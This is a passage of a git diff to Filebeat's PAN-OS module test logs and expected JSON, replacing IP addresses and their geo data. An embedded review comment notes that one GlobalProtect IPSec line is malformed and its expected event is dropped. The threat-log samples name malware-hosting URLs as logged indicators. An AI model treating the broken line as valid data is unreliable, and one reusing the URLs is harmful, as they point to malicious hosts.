- "source.geo.location.lon": -121.919, - "source.geo.region_iso_code": "US-CA", - "source.geo.region_name": "California", - "source.ip": "108.255.197.247", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "source.user.full_name": "xxxxxx", "source.user.id": "00u1abvz4pYqdM8ms4x6", "tags": [ diff --git a/x-pack/filebeat/module/panw/panos/test/global_protect.log b/x-pack/filebeat/module/panw/panos/test/global_protect.log index fdb7add640d4..23b982e2a09a 100644 --- a/x-pack/filebeat/module/panw/panos/test/global_protect.log +++ b/x-pack/filebeat/module/panw/panos/test/global_protect.log 
@@ -1,10 +1,10 @@
 1,2021/03/24 11:30:00,013101001305,GLOBALPROTECT,0,2305,2021/03/24 11:30:00,vsys1,portal-prelogin,before-login,,,,BE,,11.134.5.168,0.0.0.0,10.52.36.15,0.0.0.0,09300bcc-23-4900-8de9-32695452fa,,5.2.4,Windows,"Microsoft Windows 10 Pro , 64-bit",1,,,"",success,,0,,0,GlobalProtect Portal,69200719497738,0x0
 1,2021/03/24 11:29:49,013101001308,GLOBALPROTECT,0,2305,2021/03/24 11:29:49,vsys1,gateway-config-release,configuration,,,domain\user,BE,CP935,83.14.113.11,0.0.0.0,10.20.13.217,0.0.0.0,e0957c11-93-437a-9e23-9f0c24059898,5J9VN53,5.2.4,Windows,"Microsoft Windows 10 Pro , 64-bit",1,,,"",success,,0,,0,GlobalProtect_GW,6919501582016786,0x0
-1,2021/04/07 17:41:30,013101305,GLOBALPROTECT,0,2305,2021/04/07 17:41:30,vsys1,gateway-hip-check,host-info,,,domain\user1,,HOST82878,7.2.2.193,0.0.0.0,12.30.0.210,0.0.0.0,523e8b-7efa-4397-a4d5-824dfa4d8a,F1SM2,5.2.4,,"",1,,,"HIP report is not needed",success,,0,,0,GlobalProtect_GW,6920071768563516860,0x0
-1,2021/04/07 17:41:29,013101308,GLOBALPROTECT,0,2305,2021/04/07 17:41:29,vsys1,gateway-getconfig,configuration,,IPSec,pre-logon,BE,HOST73486,7.2.2.171,0.0.0.0,1.40.2.67,0.0.0.0,7d01b5-f538-4fa3-a2a2-83980d1325,5C261FNR,5.2.4,Windows,"Microsoft Windows 10 Pro , 64-bit",1,,,"Config name: , Client region: BE.",success,,0,,0,GlobalProtect_GW,6944137135219737,0x0
+1,2021/04/07 17:41:30,013101305,GLOBALPROTECT,0,2305,2021/04/07 17:41:30,vsys1,gateway-hip-check,host-info,,,domain\user1,,HOST82878,7.2.2.193,0.0.0.0,67.43.156.14,0.0.0.0,523e8b-7efa-4397-a4d5-824dfa4d8a,F1SM2,5.2.4,,"",1,,,"HIP report is not needed",success,,0,,0,GlobalProtect_GW,6920071768563516860,0x0
+1,2021/04/07 17:41:29,013101308,GLOBALPROTECT,0,2305,2021/04/07 17:41:29,vsys1,gateway-getconfig,configuration,,IPSec,pre-logon,BE,HOST73486,7.2.2.171,0.0.0.0,81.2.69.193,0.0.0.0,7d01b5-f538-4fa3-a2a2-83980d1325,5C261FNR,5.2.4,Windows,"Microsoft Windows 10 Pro , 64-bit",1,,,"Config name: , Client region: BE.",success,,0,,0,GlobalProtect_GW,6944137135219737,0x0
1,2021/04/07 17:41:28,0131001309,GLOBALPROTECT,0,2305,2021/04/07 17:41:28,vsys1,gateway-tunnel-latency,tunnel,,,,userlterso,HOSTP92413,7.2.17.120,0.0.0.0,0.0.0.0,0.0.0.0,2ba9f01-b83b-4902-a1fb-1748c0365,GJG98Y2,5.2.4,,"",1,,,"Pre-tunnel latency: 67ms, Post-tunnel latency: 47ms",success,,0,,0,GlobalProtect_GW,6920071768563516847,0x0 1,2021/03/02 09:55:42,12345678999,GLOBALPROTECT,0,2305,2021/03/02 09:55:39,vsys1,gateway-auth,login,Other,,maxmustermann,10.0.0.0-10.255.255.255,PC1234,10.20.30.40,0.0.0.0,0.0.0.0,0.0.0.0,985e865f-7da3-43b4-89a9-299b1bb0c975,SERIALNR,5.1.1,Windows,"Microsoft Windows 10 Enterprise, 64-bit",1,,,,success,,0,pre-logon,0,GP GW intern,6894571632887748064,0x8000000000000000,1970-01-01T01:00:00.000+01:00,,0,manual only,, -1,2021/03/02 11:01:03,123456789999,GLOBALPROTECT,0,2305,2021/03/02 11:01:02,vsys1,gateway-setup-ipsec,tunnel,,IPSec,domain\musterman,DE,Rechner123,123.123.123.123,0.0.0.0,10.20.30.40,0.0.0.0,96c43d47-8bb5-4f78-8dfc-413a189a29e0,SERIALNR,5.1.1,Windows,"Microsoft Windows 10 Enterprise, 64-bit",1,,,,success,,0,,0,GPGateway,6894571632887761989,0x8000000000000000,1970-01-01T01:00:00.000+01:00,,0,manual only,, +1,2021/03/02 11:01:03,123456789999,GLOBALPROTECT,0,2305,2021/03/02 11:01:02,vsys1,gateway-setup-ipsec,tunnel,,IPSec,domain\musterman,DE,Rechner67.43.156.12.123,0.0.0.0,10.20.30.40,0.0.0.0,96c43d47-8bb5-4f78-8dfc-413a189a29e0,SERIALNR,5.1.1,Windows,"Microsoft Windows 10 Enterprise, 64-bit",1,,,,success,,0,,0,GPGateway,6894571632887761989,0x8000000000000000,1970-01-01T01:00:00.000+01:00,,0,manual only,, 1,2021/03/02 09:39:33,12345678999,GLOBALPROTECT,0,2305,2021/03/02 09:39:26,vsys1,portal-prelogin,before-login,,,Max.Mustermann@domain.de,10.0.0.0-10.255.255.255,,10.20.30.40,0.0.0.0,0.0.0.0,0.0.0.0,0183d851-7ea2-4a0d-80de-fde1e04ce12f,,5.1.1,Windows,"Microsoft Windows 10 Enterprise, 64-bit",1,,,,success,,0,,0,GP Portal,6894571632887745099,0x8000000000000000,1970-01-01T01:00:00.000+01:00,,0,manual only,, 1,2021/03/02 
09:47:18,12345678999,GLOBALPROTECT,0,2305,2021/03/02 09:47:13,vsys1,portal-getconfig,configuration,,,domain\maxmustermann,10.0.0.0-10.255.255.255,PC12345,10.20.30.40,0.0.0.0,0.0.0.0,0.0.0.0,8cbc136b-e262-4cf8-912c-95ea132d9fef,SERIENNR,5.1.1,Windows,"Microsoft Windows 10 Enterprise, 64-bit",1,,,"Config name: GP Clients, Machine Certificate CN : (null)",success,,0,pre-logon,0,GP Portal,6894571632887746544,0x8000000000000000,1970-01-01T01:00:00.000+01:00,,0,manual only,, 931201168,2021-10-22T16:10:10.000000Z,no-serial,GLOBALPROTECT,globalprotect,9.1,2021-10-22T16:10:05.000000Z,vsys1,gateway-hip-check,host-info,,,host\\user,,HOSTNAME,10.1.1.1,,10.2.2.2,fc00::1,8cbc136b-e262-4cf8-912c-95ea132d9fef,SERIALNR,5.2.6,,,1,,,HIP report is not needed,success,,0,,0,GlobalProtect_External_Gateway,1305925,true diff --git a/x-pack/filebeat/module/panw/panos/test/global_protect.log-expected.json b/x-pack/filebeat/module/panw/panos/test/global_protect.log-expected.json index 876b298f958d..39f636866bad 100644 --- a/x-pack/filebeat/module/panw/panos/test/global_protect.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/global_protect.log-expected.json 
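Review bot: The rewritten `gateway-setup-ipsec` record (the `+1,2021/03/02 11:01:03,…` line) is malformed: the IP substitution swallowed the comma between the hostname field and the public-IP field, turning `Rechner123,123.123.123.123` into `Rechner67.43.156.12.123`, so the line now has one CSV field fewer than its neighbours, a garbled hostname, and an "IP" column that is not a valid address. The expected-output hunk later in this diff deletes that whole event instead of updating it, which is consistent with the line no longer parsing, and presumably means the only IPSec tunnel-setup fixture silently loses its coverage. The field should read `…domain\musterman,DE,Rechner123,67.43.156.12,0.0.0.0,10.20.30.40,…` and the expected JSON should be regenerated so the event comes back with the new `client.nat.ip`/`source.nat.ip` value. After a bulk IP replacement it is worth diffing each line's comma count against the old file, since a pattern like `123.123.123.123` with unescaped dots can match across the preceding `123,`.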
@@ -115,19 +115,19 @@ }, { "@timestamp": "2021-04-07T17:41:30.000-02:00", - "client.address": "12.30.0.210", - "client.ip": "12.30.0.210", + "client.address": "67.43.156.14", + "client.ip": "67.43.156.14", "client.nat.ip": "7.2.2.193", "event.code": "gateway-hip-check", "event.dataset": "panw.panos", "event.duration": 0, "event.module": "panw", - "event.original": "1,2021/04/07 17:41:30,013101305,GLOBALPROTECT,0,2305,2021/04/07 17:41:30,vsys1,gateway-hip-check,host-info,,,domain\\user1,,HOST82878,7.2.2.193,0.0.0.0,12.30.0.210,0.0.0.0,523e8b-7efa-4397-a4d5-824dfa4d8a,F1SM2,5.2.4,,\"\",1,,,\"HIP report is not needed\",success,,0,,0,GlobalProtect_GW,6920071768563516860,0x0", + "event.original": "1,2021/04/07 17:41:30,013101305,GLOBALPROTECT,0,2305,2021/04/07 17:41:30,vsys1,gateway-hip-check,host-info,,,domain\\user1,,HOST82878,7.2.2.193,0.0.0.0,67.43.156.14,0.0.0.0,523e8b-7efa-4397-a4d5-824dfa4d8a,F1SM2,5.2.4,,\"\",1,,,\"HIP report is not needed\",success,,0,,0,GlobalProtect_GW,6920071768563516860,0x0", "event.outcome": "success", "event.timezone": "-02:00", "fileset.name": "panos", "host.id": "523e8b-7efa-4397-a4d5-824dfa4d8a", - "host.ip": "12.30.0.210", + "host.ip": "67.43.156.14", "host.name": "HOST82878", "input.type": "log", "log.offset": 640, 
@@ -154,25 +154,21 @@ "HOST82878" ], "related.ip": [ - "12.30.0.210", + "67.43.156.14", "7.2.2.193" ], "related.user": [ "user1" ], "service.type": "panw", - "source.address": "12.30.0.210", - "source.as.number": 7018, - "source.as.organization.name": "AT&T Services, Inc.", - "source.geo.city_name": "Greenwood", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 39.5992, - "source.geo.location.lon": -86.13, - "source.geo.region_iso_code": "US-IN", - "source.geo.region_name": "Indiana", - "source.ip": "12.30.0.210", + "source.address": "67.43.156.14", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.nat.ip": "7.2.2.193", "source.user.domain": "domain", "source.user.name": "user1", 
@@ -185,24 +181,24 @@ }, { "@timestamp": "2021-04-07T17:41:29.000-02:00", - "client.address": "1.40.2.67", - "client.ip": "1.40.2.67", + "client.address": "81.2.69.193", + "client.ip": "81.2.69.193", "client.nat.ip": "7.2.2.171", "event.code": "gateway-getconfig", "event.dataset": "panw.panos", "event.duration": 0, "event.module": "panw", - "event.original": "1,2021/04/07 17:41:29,013101308,GLOBALPROTECT,0,2305,2021/04/07 17:41:29,vsys1,gateway-getconfig,configuration,,IPSec,pre-logon,BE,HOST73486,7.2.2.171,0.0.0.0,1.40.2.67,0.0.0.0,7d01b5-f538-4fa3-a2a2-83980d1325,5C261FNR,5.2.4,Windows,\"Microsoft Windows 10 Pro , 64-bit\",1,,,\"Config name: , Client region: BE.\",success,,0,,0,GlobalProtect_GW,6944137135219737,0x0", + "event.original": "1,2021/04/07 17:41:29,013101308,GLOBALPROTECT,0,2305,2021/04/07 17:41:29,vsys1,gateway-getconfig,configuration,,IPSec,pre-logon,BE,HOST73486,7.2.2.171,0.0.0.0,81.2.69.193,0.0.0.0,7d01b5-f538-4fa3-a2a2-83980d1325,5C261FNR,5.2.4,Windows,\"Microsoft Windows 10 Pro , 64-bit\",1,,,\"Config name: , Client region: BE.\",success,,0,,0,GlobalProtect_GW,6944137135219737,0x0", "event.outcome": "success", "event.timezone": "-02:00", "fileset.name": "panos", "host.id": "7d01b5-f538-4fa3-a2a2-83980d1325", - "host.ip": "1.40.2.67", + "host.ip": "81.2.69.193", "host.name": "HOST73486", "host.os.family": "Windows", "host.os.full": "Microsoft Windows 10 Pro , 64-bit", "input.type": "log", - "log.offset": 946, + "log.offset": 947, "network.type": "ipv4", "observer.hostname": "GlobalProtect_GW", "observer.product": "PAN-OS", 
@@ -227,26 +223,24 @@ "HOST73486" ], "related.ip": [ - "1.40.2.67", - "7.2.2.171" + "7.2.2.171", + "81.2.69.193" ], "related.user": [ "pre-logon" ], "service.type": "panw", - "source.address": "1.40.2.67", - "source.as.number": 4804, - "source.as.organization.name": "Microplex PTY LTD", - "source.geo.city_name": "Seven Hills", - "source.geo.continent_name": "Oceania", - "source.geo.country_iso_code": "AU", - "source.geo.country_name": "Australia", - "source.geo.location.lat": -33.777, - "source.geo.location.lon": 150.9373, + "source.address": "81.2.69.193", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.name": "BE", - "source.geo.region_iso_code": "AU-NSW", - "source.geo.region_name": "New South Wales", - "source.ip": "1.40.2.67", + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.nat.ip": "7.2.2.171", "source.user.name": "pre-logon", "tags": [ @@ -272,7 +266,7 @@ "host.ip": "0.0.0.0", "host.name": "HOSTP92413", "input.type": "log", - "log.offset": 1307, + "log.offset": 1310, "network.type": "ipv4", "observer.hostname": "GlobalProtect_GW", "observer.product": "PAN-OS", @@ -328,7 +322,7 @@ "host.os.family": "Windows", "host.os.full": "Microsoft Windows 10 Enterprise, 64-bit", "input.type": "log", - "log.offset": 1641, + "log.offset": 1644, "network.type": "ipv4", "observer.hostname": "GP GW intern", "observer.product": "PAN-OS", 
@@ -373,71 +367,6 @@ ], "user.name": "maxmustermann" }, - { - "@timestamp": "2021-03-02T11:01:02.000-02:00", - "client.address": "10.20.30.40", - "client.ip": "10.20.30.40", - "client.nat.ip": "123.123.123.123", - "event.code": "gateway-setup-ipsec", - "event.dataset": "panw.panos", - "event.duration": 0, - "event.module": "panw", - "event.original": "1,2021/03/02 11:01:03,123456789999,GLOBALPROTECT,0,2305,2021/03/02 11:01:02,vsys1,gateway-setup-ipsec,tunnel,,IPSec,domain\\musterman,DE,Rechner123,123.123.123.123,0.0.0.0,10.20.30.40,0.0.0.0,96c43d47-8bb5-4f78-8dfc-413a189a29e0,SERIALNR,5.1.1,Windows,\"Microsoft Windows 10 Enterprise, 64-bit\",1,,,,success,,0,,0,GPGateway,6894571632887761989,0x8000000000000000,1970-01-01T01:00:00.000+01:00,,0,manual only,,", - "event.outcome": "success", - "event.timezone": "-02:00", - "fileset.name": "panos", - "host.id": "96c43d47-8bb5-4f78-8dfc-413a189a29e0", - "host.ip": "10.20.30.40", - "host.name": "Rechner123", - "host.os.family": "Windows", - "host.os.full": "Microsoft Windows 10 Enterprise, 64-bit", - "input.type": "log", - "log.offset": 2058, - "network.type": "ipv4", - "observer.hostname": "GPGateway", - "observer.product": "PAN-OS", - "observer.serial_number": "123456789999", - "observer.type": "firewall", - "observer.vendor": "Palo Alto Networks", - "panw.panos.actionflags": "0x8000000000000000", - "panw.panos.client_ver": "5.1.1", - "panw.panos.error_code": "0", - "panw.panos.priority": "manual only", - "panw.panos.repeatcnt": 1, - "panw.panos.response_time": "0", - "panw.panos.sequence_number": 6894571632887761989, - "panw.panos.serial_number": "SERIALNR", - "panw.panos.source.nat.ip": "123.123.123.123", - "panw.panos.stage": "tunnel", - "panw.panos.sub_type": "0", - "panw.panos.tunnel_type": "IPSec", - "panw.panos.type": "GLOBALPROTECT", - "panw.panos.virtual_sys": "vsys1", - "related.hosts": [ - "GPGateway", - "Rechner123" - ], - "related.ip": [ - "10.20.30.40", - "123.123.123.123" - ], - "related.user": [ - 
"musterman" - ], - "service.type": "panw", - "source.address": "10.20.30.40", - "source.geo.name": "DE", - "source.ip": "10.20.30.40", - "source.nat.ip": "123.123.123.123", - "source.user.domain": "domain", - "source.user.name": "musterman", - "tags": [ - "forwarded", - "pan-os" - ], - "user.domain": "domain", - "user.name": "musterman" - }, { "@timestamp": "2021-03-02T09:39:26.000-02:00", "client.address": "0.0.0.0", @@ -566,7 +495,7 @@ "user.name": "maxmustermann" }, { - "@timestamp": "2021-10-22T16:10:05.000Z", + "@timestamp": "2021-10-22T14:10:05.000-02:00", "client.address": "10.2.2.2", "client.ip": "10.2.2.2", "client.nat.ip": "10.1.1.1", @@ -624,7 +553,7 @@ "user.name": "host" }, { - "@timestamp": "2021-11-09T21:45:14.000Z", + "@timestamp": "2021-11-09T19:45:14.000-02:00", "client.address": "10.4.4.4", "client.ip": "10.4.4.4", "client.nat.ip": "10.3.3.3", @@ -682,7 +611,7 @@ "user.name": "user" }, { - "@timestamp": "2021-11-09T21:45:14.000Z", + "@timestamp": "2021-11-09T19:45:14.000-02:00", "event.code": "gateway-tunnel-latency", "event.dataset": "panw.panos", "event.duration": 0, diff --git a/x-pack/filebeat/module/panw/panos/test/hipmatch.log b/x-pack/filebeat/module/panw/panos/test/hipmatch.log index 26bd6dd14d45..1341b080d500 100644 --- a/x-pack/filebeat/module/panw/panos/test/hipmatch.log +++ b/x-pack/filebeat/module/panw/panos/test/hipmatch.log 
@@ -1,2 +1,2 @@ 1,2021/03/02 10:06:31,12345678999,HIPMATCH,0,2305,2021/03/02 10:06:25,domain\mustermanm,vsys1,PC12345,,10.20.30.40,GlobalProtect 5.1.1,1,object,0,0,6894571641485024543,0x8000000000000000,267,24,19,0,,de-firewall,1,0.0.0.0,d275bcbe-3a07-4e69-85c5-3ad9192c212e,F0S48Y2,,1970-01-01T01:00:00.000+01:00 -1,2019/10/09 10:20:15,001234567890002,HIPMATCH,0,2304,2019/10/09 10:20:15,ira,vsys1,oh-C02ABCDEFGH4,Mac,67.240.185.235,GP-HIP-PROFILE,1,profile,0,0,0123456789,0x0,0,0,0,0,,SumoRedfw01a,1,0.0.0.0,gh:85:90:99:5a:40,C02ABCDEFGH +1,2019/10/09 10:20:15,001234567890002,HIPMATCH,0,2304,2019/10/09 10:20:15,ira,vsys1,oh-C02ABCDEFGH4,Mac,89.160.20.112,GP-HIP-PROFILE,1,profile,0,0,0123456789,0x0,0,0,0,0,,SumoRedfw01a,1,0.0.0.0,gh:85:90:99:5a:40,C02ABCDEFGH diff --git a/x-pack/filebeat/module/panw/panos/test/hipmatch.log-expected.json b/x-pack/filebeat/module/panw/panos/test/hipmatch.log-expected.json index 7df8f3a551ca..ff2a2a307d86 100644 --- a/x-pack/filebeat/module/panw/panos/test/hipmatch.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/hipmatch.log-expected.json @@ -56,10 +56,10 @@ }, { "@timestamp": "2019-10-09T10:20:15.000-02:00", - "client.ip": "67.240.185.235", + "client.ip": "89.160.20.112", "event.dataset": "panw.panos", "event.module": "panw", - "event.original": "1,2019/10/09 10:20:15,001234567890002,HIPMATCH,0,2304,2019/10/09 10:20:15,ira,vsys1,oh-C02ABCDEFGH4,Mac,67.240.185.235,GP-HIP-PROFILE,1,profile,0,0,0123456789,0x0,0,0,0,0,,SumoRedfw01a,1,0.0.0.0,gh:85:90:99:5a:40,C02ABCDEFGH", + "event.original": "1,2019/10/09 10:20:15,001234567890002,HIPMATCH,0,2304,2019/10/09 10:20:15,ira,vsys1,oh-C02ABCDEFGH4,Mac,89.160.20.112,GP-HIP-PROFILE,1,profile,0,0,0123456789,0x0,0,0,0,0,,SumoRedfw01a,1,0.0.0.0,gh:85:90:99:5a:40,C02ABCDEFGH", "event.outcome": "success", "event.timezone": "-02:00", "fileset.name": "panos", 
@@ -93,24 +93,24 @@ "oh-C02ABCDEFGH4" ], "related.ip": [ - "67.240.185.235" + "89.160.20.112" ], "related.user": [ "ira" ], "service.type": "panw", - "source.address": "67.240.185.235", - "source.as.number": 11351, - "source.as.organization.name": "Charter Communications Inc", - "source.geo.city_name": "Portland", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 43.6598, - "source.geo.location.lon": -70.2547, - "source.geo.region_iso_code": "US-ME", - "source.geo.region_name": "Maine", - "source.ip": "67.240.185.235", + "source.address": "89.160.20.112", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.112", "source.user.name": "ira", "tags": [ "forwarded", diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log b/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log index 421c6f796a6c..4cd75721c32d 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log +++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log 
@@ -31,4 +31,4 @@ Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,CONFIG,0,0,2012/04/09 09:00:20 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,general,1,2012/04/09 03:21:53,,unknown,,0,0,general,informational,Config installed,821,0x0 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,ras,0,2012/04/09 03:21:53,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,vpn,0,2012/04/09 03:21:53,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json index 173cdec4dd8c..e19ca378b844 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json 
@@ -732,19 +732,15 @@ "client.packets": 1, "client.port": 59309, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -757,7 +753,7 @@ "event.end": "2012-04-10T04:39:56.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:56.000-02:00", "event.timezone": "-02:00", @@ -772,7 +768,7 @@ "log.offset": 5853, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:mY2EPMYo0US42k87/2uTzjo/rGA=", + "network.community_id": "1:tf34cPo413Ta9avfHZIP6b5DHXc=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -804,14 +800,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log b/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log index b493a709848f..fff6477c1e40 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log +++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log 
@@ -1,100 +1,100 @@ -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,"lorexx.cn/loader.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=2",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=5",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=7",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/load.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 